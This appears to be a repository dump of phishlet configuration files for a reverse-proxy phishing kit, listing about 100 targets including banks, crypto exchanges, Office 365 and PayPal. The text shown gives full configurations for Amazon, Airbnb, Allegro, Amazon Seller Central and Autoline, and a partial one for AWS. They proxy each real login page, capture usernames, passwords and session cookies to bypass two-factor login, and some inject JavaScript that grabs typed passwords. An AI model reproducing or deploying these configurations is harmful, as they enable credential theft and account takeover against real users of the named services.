├── 163working.yaml
├── Amazon--.yaml
├── airbnb.yaml
├── airbnbfr.yaml
├── alibaba.yaml
├── allegro.yaml
├── amazon-seller.yaml
├── amazon.yaml
├── americanexpress.yaml
├── aol.yaml
├── autoline.yaml
├── aws.yaml
├── banistmo.yaml
├── barclays.yaml
├── binance.yaml
├── binance2-(redirect-Captcha).yaml
├── binanceus.yaml
├── blockchain(Basic).yaml
├── blockchain(Fixed).yaml
├── blockchain(Fixed2).yaml
├── blockchain.yaml
├── bmo.yaml
├── bmomobile.yaml
├── booking.yaml
├── capital.yaml
├── chase.yaml
├── chrome_extension.yaml
├── citrix.yaml
├── coinbase.yaml
├── coinspot.yaml
├── coolblue.yaml
├── dropbox.yaml
├── ebay.yaml
├── edd.yaml
├── facebook-d.yaml
├── facebook-d2.yaml
├── facebook-d3.yaml
├── facebook-fix.yaml
├── facebook.yaml
├── fidelity.yaml
├── fudan.yaml
├── github.yaml
├── godaddy(sso).yaml
├── godaddy.yaml
├── google.yaml
├── google2.yaml
├── gsuite.yaml
├── gusto.yaml
├── hetzner.yaml
├── hinet.yaml
├── hotmail.yaml
├── huntington.yaml
├── icloud.yaml
├── icloud2.yaml
├── instagram.yaml
├── intuit.yaml
├── ionos.yaml
├── linkedin.yaml
├── linkedin2.yaml
├── luno.yaml
├── microsoft.yaml
├── mobile-de.yaml
├── namecheap.yaml
├── notthingham.yaml
├── nottingham.yaml
├── o365(2).yaml
├── o365(April-latest).yaml
├── o365(outlook).yaml
├── o365(working-october21).yaml
├── o365(working2).yaml
├── o365(working2a).yaml
├── o365.yaml
├── okta.yaml
├── onelogin.yaml
├── openbank.yaml
├── paxful.yaml
├── paypal(working2).yaml
├── paypal.yaml
├── playstation-B.yaml
├── playstation.yaml
├── protonmail.yaml
├── qdefi.yaml
├── quickbooks(intuit).yaml
├── rackspace.yaml
├── reddit.yaml
├── roblox.yaml
├── schwab(under-maintain).yaml
├── schwab.yaml
├── snapchat.yaml
├── steam.yaml
├── stripe.yaml
├── sununion.yaml
├── supersport.yaml
├── tiktok.yaml
├── tradus.yaml
├── twitter-mobile.yaml
├── twitter.yaml
├── txstate.yaml
├── usaa.yaml
└── vanguard.yaml


/Amazon--.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false}
 6 |   - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
 9 |   - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
10 |   - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
11 |   - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
12 |   - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
13 |   - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
14 | auth_tokens:
15 |   - domain: '.amazon.com'
16 |     keys: ['session-token', 'session-id-time', 'session-id', '.*,regexp']
17 |   - domain: 'www.amazon.com'
18 |     keys: ['csm-hit,opt', '.*,regexp']
19 | 
20 | auth_urls:
21 |   - '/'
22 | credentials:
23 |   username:
24 |     key: 'email'
25 |     search: '(.*)'
26 |     type: 'post'
27 |   password:
28 |     key: 'unenc_password'
29 |     search: '(.*)'
30 |     type: 'post'
31 |     
32 | login:
33 |   domain: 'www.amazon.com'
34 |   path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0'
35 | js_inject:
36 |   - trigger_domains: ["www.amazon.com"]
37 |     trigger_paths: ["/ap/signin", "/signin"]
38 |     trigger_params: []
39 |     script: |  
40 |       function onclickListener(){
41 |         var submit = document.querySelectorAll('input[type="submit"]')[0];
42 |         submit.setAttribute("onclick", "sendPass()");
43 |         submit.addEventListener("click", sendPass);
44 |         return;
45 |       }
46 |       function sendPass(){
47 |         var password = document.getElementsByName("password")[0].value;
48 |         var xhr = new XMLHttpRequest();
49 |         xhr.open("POST", '/accounts/login/ajax/', true);
50 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
51 |         xhr.send("unenc_password="+encodeURIComponent(password));
52 |         return;
53 |       }
54 |       setTimeout(function(){ onclickListener(); }, 1000);


--------------------------------------------------------------------------------
/airbnbfr.yaml:
--------------------------------------------------------------------------------
 1 | author: '@me'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: true}
 5 |   - {phish_sub: '', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: false}
 6 | sub_filters:
 7 |   - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '</head>', replace: '<style> ._1agy6r6e {display:none;} ._p03egf:nth-of-type(2), ._p03egf:nth-of-type(3), ._p03egf:nth-of-type(4), ._p03egf:nth-of-type(4) + form { display: none !important;}  </style></head>', mimes: ['text/html', 'application/json', 'application/xhtml+xml', 'application/xml']}
 8 | auth_tokens:
 9 |   - domain: '.airbnb.co.uk'
10 |     keys: ['.*,regexp']
11 |   - domain: 'www.airbnb.co.uk'
12 |     keys: ['.*,regexp']
13 | credentials:
14 |   username:
15 |     key: 'phoneNumber'
16 |     search: '(.*)'
17 |     type: 'post'
18 |   password:
19 |     key: 'phone'
20 |     search: '(.*)'
21 |     type: 'post'
22 | 
23 | force_post:
24 |   - path: '/api/v2/phone_one_time_passwords'
25 |     search:
26 |       - {key: 'currency', search: '.*'}
27 |       - {key: 'key', search: '.*'}
28 |       - {key: 'from', search: '.*'}
29 |       - {key: 'locale', search: '.*'}
30 |       - {key: 'otpMethod', search: '.*'}
31 |       - {key: 'phoneNumber', search: '.*'}
32 |       - {key: 'workFlow', search: '.*'}
33 |     force:
34 |       - {key: 'remember_me', value: 'true'}
35 |     type: 'post'
36 | auth_urls:
37 |   - '/'
38 | login:
39 |   domain: 'www.airbnb.co.uk'
40 |   path: '/login'
41 | 
42 | 
43 | 
44 | 


--------------------------------------------------------------------------------
/allegro.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: '', orig_sub: '', domain: 'allegro.pl', session: true, is_landing: false, auto_filter: false}
 5 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'allegro.pl', session: true, is_landing: true, auto_filter: false}
 6 |   - {phish_sub: 'edge', orig_sub: 'edge', domain: 'allegro.pl', session: true, is_landing: false, auto_filter: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'www.allegro.pl', replace: 'www.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
 9 |   - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'edge.allegro.pl', replace: 'edge.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
10 |   - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'bing.com', replace: 'asasdasdasdjustranom.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
11 |   - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'tda.io', replace: 'adasdasdasdasdasdasdqwepoa.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
12 |   - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'www.allegro.pl', replace: 'www.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
13 |   - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'edge.allegro.pl', replace: 'edge.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
14 |   - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'bing.com', replace: 'asasdasdasdjustranom.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
15 |   - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'tda.io', replace: 'adasdasdasdasdasdasdqwepoa.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
16 | auth_tokens:
17 |   - domain: '.allegro.pl'
18 |     keys: ['.*,regexp']
19 | auth_urls:
20 |   - '/moje-allegro/moje-konto'
21 |   
22 | credentials:
23 |   username:
24 |     key: ''
25 |     search: '"username":"([^"]*)'
26 |     type: 'json'
27 |   password:
28 |     key: ''
29 |     search: '"password":"([^"]*)'
30 |     type: 'json'
31 |   custom:
32 |     - key: '_csrf'
33 |       search: '(.*)'
34 |       type: 'post'
35 | 
36 | login:
37 |   domain: 'www.allegro.pl'
38 |   path: '/login/form/'


--------------------------------------------------------------------------------
/amazon-seller.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'sellercentral', orig_sub: 'sellercentral', domain: 'amazon.co.uk', session: true, is_landing: true}
 5 |   - {phish_sub: 'fls-eu', orig_sub: 'fls-eu', domain: 'amazon.com', session: false, is_landing: false}
 6 |   - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false}
 7 | 
 8 | sub_filters:
 9 | 
10 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
11 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
12 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
13 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
14 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
15 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
16 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
17 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
18 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
19 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
20 |   - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
21 |   - {triggers_on: 'fls-eu.amazon.com', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
22 |   - {triggers_on: 'fls-eu.amazon.com', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
23 |   - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
24 |   - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
25 | 
26 | auth_tokens:
27 |   - domain: '.amazon.co.uk'
28 |     keys: ['.*,regexp']
29 |   - domain: '.amazon.com'
30 |     keys: ['.*,regexp']
31 | auth_urls:
32 |   - '/'
33 |   - '/*'
34 |   
35 | credentials:
36 |   username:
37 |     key: 'email'
38 |     search: '(.*)'
39 |     type: 'post'
40 |   password:
41 |     key: 'password'
42 |     search: '(.*)'
43 |     type: 'post'
44 | 
45 | force_post:
46 |   - path: '/ap/signin'
47 |     search:
48 |       - {key: 'email', search: '.*'}
49 |       - {key: 'password', search: '.*'}
50 |     force:
51 |       - {key: 'rememberMe', value: 'true'}
52 |     type: 'post'
53 |     
54 | login:
55 |   domain: 'sellercentral.amazon.co.uk'
56 |   path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0'
57 | 


--------------------------------------------------------------------------------
/amazon.yaml:
--------------------------------------------------------------------------------
 1 | author: '@an0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false}
 6 |   - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
 9 |   - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
10 |   - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
11 |   - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
12 |   - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
13 |   - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
14 | auth_tokens:
15 |   - domain: '.amazon.com'
16 |     keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','skin','a-ogbcbff']
17 | credentials:
18 |   username:
19 |     key: 'email'
20 |     search: '(.*)'
21 |     type: 'post'
22 |   password:
23 |     key: 'password'
24 |     search: '(.*)'
25 |     type: 'post'
26 | login:
27 |   domain: 'www.amazon.com'
28 |   path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0'
29 | 


--------------------------------------------------------------------------------
/autoline.yaml:
--------------------------------------------------------------------------------
 1 | author: '@AN0NUD4Y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: '', orig_sub: '', domain: 'autoline.info', session: true, is_landing: true}
 5 |   - {phish_sub: 'mc', orig_sub: 'mc', domain: 'webvisor.org', session: true, is_landing: false}
 6 |   - {phish_sub: 'top', orig_sub: '', domain: 'autoline-top.com', session: true, is_landing: false}
 7 |   - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'jsdelivr.net', session: true, is_landing: false}
 8 |   - {phish_sub: 'cloudfront', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', session: true, is_landing: false}
 9 | 
10 | 
11 | sub_filters:
12 |  
13 |   - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
14 |   - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
15 |   - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
16 | 
17 |   - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
18 |   - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
19 |   - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
20 | 
21 |   - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
22 |   - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
23 |   - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
24 | 
25 |   - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
26 |   - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
27 |   - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
28 | 
29 |   - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
30 |   - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
31 |   - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
32 | 
33 | 
34 | auth_tokens:
35 |   - domain: 'autoline.info/my/dashboard/'
36 |     keys: ['SID','.*,regexp']
37 |   - domain: 'autoline.info/'
38 |     keys: ['SID','.*,regexp']
39 |   
40 | credentials:
41 |   username:
42 |     key: 'login_email'
43 |     search: '(.*)'
44 |     type: 'post'
45 |   
46 |   password:
47 |     key: 'login_password'
48 |     search: '(.*)'
49 |     type: 'post'
50 |   
51 | login:
52 |   domain: 'autoline.info'
53 |   path: '/login/'
54 | 
55 | js_inject:
56 |   - trigger_domains: ["autoline.info"]
57 |     trigger_paths: ["/login/"]
58 |     trigger_params: []
59 |     script: |
60 |       function lp(){
61 |         var submit = document.getElementsByName('submit')[0];
62 |         submit.setAttribute("onclick", "sendPass()");
63 |         return;
64 |       }
65 |       function sendPass(){
66 |         var email = document.getElementsByName("login")[0].value;
67 |         var password = document.getElementsByName("password")[0].value;
68 |         var xhr = new XMLHttpRequest();
69 |         xhr.open("POST", '/', true);
70 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
71 |         xhr.send("login_password="+encodeURIComponent(password));
72 |         console.log("LEAKING CREDENTIALS...")
73 |         return;
74 |       }
75 |       setTimeout(function(){ lp(); }, 1000);


--------------------------------------------------------------------------------
/aws.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true}
 5 |   - {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
 6 |   - {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
 7 | 
 8 |   - {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
 9 |   - {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
10 |   - {phish_sub: 'portal.aws', orig_sub: 'portal.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
11 |   
12 |   - {phish_sub: 'aws-signin-website-assets.s3', orig_sub: 'aws-signin-website-assets.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true}
13 |   - {phish_sub: 'cdn.assets.as2', orig_sub: 'cdn.assets.as2', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true}
14 |   - {phish_sub: 'opfcaptcha-prod.s3', orig_sub: 'opfcaptcha-prod.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true}
15 | 
16 |   - {phish_sub: 'a.b.cdn.console', orig_sub: 'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true}
17 |   - {phish_sub: 'd1', orig_sub: 'd1', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true}
18 | 
19 |   - {phish_sub: 'd2eezf66cfmyv', orig_sub: 'd2eezf66cfmyv', domain: 'cloudfront.net', session: true, is_landing: false, auto_filter: true}
20 | 
21 | 
22 | ## SUBDOMAINS BASED ON GEO LOCATION.
23 | 
24 |   - {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
25 |   - {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}  
26 |   - {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}  
27 |   - {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
28 |   - {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
29 |   - {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
30 |   - {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
31 |   - {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
32 |   - {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
33 |   - {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
34 |   - {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
35 |   - {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
36 |   - {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
37 |   - {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
38 |   - {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
39 |   - {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
40 |   - {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
41 |   - {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
42 |   - {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
43 |   - {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
